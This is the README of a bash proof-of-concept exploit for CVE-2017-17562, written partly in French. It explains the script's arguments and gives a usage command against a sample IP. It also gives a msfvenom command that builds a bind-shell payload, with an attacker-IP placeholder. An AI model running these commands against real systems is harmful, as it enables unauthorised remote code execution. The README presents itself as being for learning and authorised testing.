
PoC for CVE-2017-17562 written in bash
Une implémentation de PoC en Bash pour CVE-2017-17562.
Nécessite curl pour élaborer les requêtes HTTP.
Basé sur les implémentations de Metasploit et @fssecur3.
Les arguments suivants doivent être configurés car ils sont requis pour la reconnaissance et l'envoi de la charge utile :
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine
Optionnellement, les arguments suivants peuvent également être configurés :
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints
Le présent code est uniquement à des fins d'apprentissage et de démonstration. Vous ne devez pas l'utiliser sur des cibles pour lesquelles vous n'avez pas l'autorisation.
Aucune charge utile n'est fournie dans ce dépôt. Cependant, tout binaire correspondant à l'architecture du système d'exploitation cible devrait fonctionner. Pour créer une charge utile de shell lié, vous pouvez utiliser msfvenon :
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so